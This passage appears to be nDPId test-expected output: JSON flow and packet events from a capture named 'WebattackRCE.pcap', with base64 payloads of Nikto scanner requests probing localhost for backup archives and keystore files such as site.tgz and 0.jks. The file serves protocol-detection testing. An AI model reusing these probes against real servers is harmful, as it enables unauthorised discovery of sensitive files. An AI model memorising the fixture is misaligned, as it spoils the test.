+01063{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":318,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":318,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277183,"flow_last_seen":1576420277183,"flow_idle_time":7560000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420277183,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50180,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP 
Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":319,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":319,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277184,"flow_last_seen":1576420277184,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277184,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50182,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":319,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":319,"flow_packet_id":1,"flow_last_seen":1576420277184,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277184,"pkt":"AAAAAAAAAAAAAAAACABFAADAdAhAAEAGyC1\/AAABfwAAAcQGH5BYeUyXBV+uwoAYAED+tAAAAQEICp1m\/OidZvzoR0VUIC9zaXRlLnRneiBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} 
+01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":319,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":319,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277184,"flow_last_seen":1576420277184,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277184,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50182,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":320,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":320,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277185,"flow_last_seen":1576420277185,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277185,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50184,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":320,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":320,"flow_packet_id":1,"flow_last_seen":1576420277185,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277185,"pkt":"AAAAAAAAAAAAAAAACABFAADACsVAAEAGMXF\/AAABfwAAAcQIH5AHdTJUhgOj64AYAED+tAAAAQEICp1m\/OmdZvzpR0VUIC9zaXRlLnRneiBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} +01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":320,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":320,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277185,"flow_last_seen":1576420277185,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277185,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50184,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":321,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":321,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277186,"flow_last_seen":1576420277186,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420277186,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50186,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":321,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":321,"flow_packet_id":1,"flow_last_seen":1576420277186,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420277186,"pkt":"AAAAAAAAAAAAAAAACABFAADEtSBAAEAGhxF\/AAABfwAAAcQKH5BCRY2PbjuWH4AYAED+uAAAAQEICp1m\/OqdZvzqR0VUIC8xMjcudGFyLmx6bWEgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} +01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":321,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":321,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277186,"flow_last_seen":1576420277186,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420277186,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50186,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP 
Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":322,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":322,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277187,"flow_last_seen":1576420277187,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420277187,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50188,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":322,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":322,"flow_packet_id":1,"flow_last_seen":1576420277187,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420277187,"pkt":"AAAAAAAAAAAAAAAACABFAADEwZ1AAEAGepR\/AAABfwAAAcQMH5B2JfkLbDSLWoAYAED+uAAAAQEICp1m\/OudZvzrR0VUIC8xMjcudGFyLmx6bWEgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} 
+01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":322,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":322,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277187,"flow_last_seen":1576420277187,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420277187,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50188,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":323,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":323,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277189,"flow_last_seen":1576420277189,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277189,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50190,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00668{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":323,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":323,"flow_packet_id":1,"flow_last_seen":1576420277189,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277189,"pkt":"AAAAAAAAAAAAAAAACABFAADAxaRAAEAGdpF\/AAABfwAAAcQOH5BgW\/00es\/TMYAYAED+tAAAAQEICp1m\/O2dZvztR0VUIC8xMjcwLmFseiBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} +01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":323,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":323,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277189,"flow_last_seen":1576420277189,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277189,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50190,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":324,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":324,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277190,"flow_last_seen":1576420277190,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277190,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50192,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":324,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":324,"flow_packet_id":1,"flow_last_seen":1576420277190,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277190,"pkt":"AAAAAAAAAAAAAAAACABFAADACFhAAEAGM95\/AAABfwAAAcQQH5AQPjDI+venWYAYAED+tAAAAQEICp1m\/O6dZvzuR0VUIC8xMjcwLmFseiBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} +01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":324,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":324,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277190,"flow_last_seen":1576420277190,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277190,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50192,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP 
Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":325,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":325,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277193,"flow_last_seen":1576420277193,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277193,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50194,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":325,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":325,"flow_packet_id":1,"flow_last_seen":1576420277193,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420277193,"pkt":"AAAAAAAAAAAAAAAACABFAAC9hYJAAEAGtrZ\/AAABfwAAAcQSH5Cznr0TB99xxoAYAED+sQAAAQEICp1m\/PGdZvzwR0VUIC8wLmprcyBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} 
+01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":325,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":325,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277193,"flow_last_seen":1576420277193,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277193,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50194,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":326,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":326,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277194,"flow_last_seen":1576420277194,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277194,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50196,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":326,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":326,"flow_packet_id":1,"flow_last_seen":1576420277194,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420277194,"pkt":"AAAAAAAAAAAAAAAACABFAAC9JiRAAEAGFhV\/AAABfwAAAcQUH5CXxR6x507sMoAYAED+sQAAAQEICp1m\/PKdZvzyR0VUIC8wLmprcyBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} +01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":326,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":326,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277194,"flow_last_seen":1576420277194,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277194,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50196,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":327,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":327,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277196,"flow_last_seen":1576420277196,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277196,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50198,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":327,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":327,"flow_packet_id":1,"flow_last_seen":1576420277196,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277196,"pkt":"AAAAAAAAAAAAAAAACABFAADASbJAAEAG8oN\/AAABfwAAAcQWH5DgxXEkcLyXoIAYAED+tAAAAQEICp1m\/PSdZvz0R0VUIC8xMjcwLnRneiBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} +01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":327,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":327,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277196,"flow_last_seen":1576420277196,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277196,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50198,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP 
Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":328,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":328,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277198,"flow_last_seen":1576420277198,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277198,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50200,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":328,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":328,"flow_packet_id":1,"flow_last_seen":1576420277198,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277198,"pkt":"AAAAAAAAAAAAAAAACABFAADAjLtAAEAGr3p\/AAABfwAAAcQYH5DOSLQrVcLjaIAYAED+tAAAAQEICp1m\/PadZvz2R0VUIC8xMjcwLnRneiBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} 
+01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":328,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":328,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277198,"flow_last_seen":1576420277198,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277198,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50200,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":329,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":329,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277200,"flow_last_seen":1576420277200,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277200,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50202,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
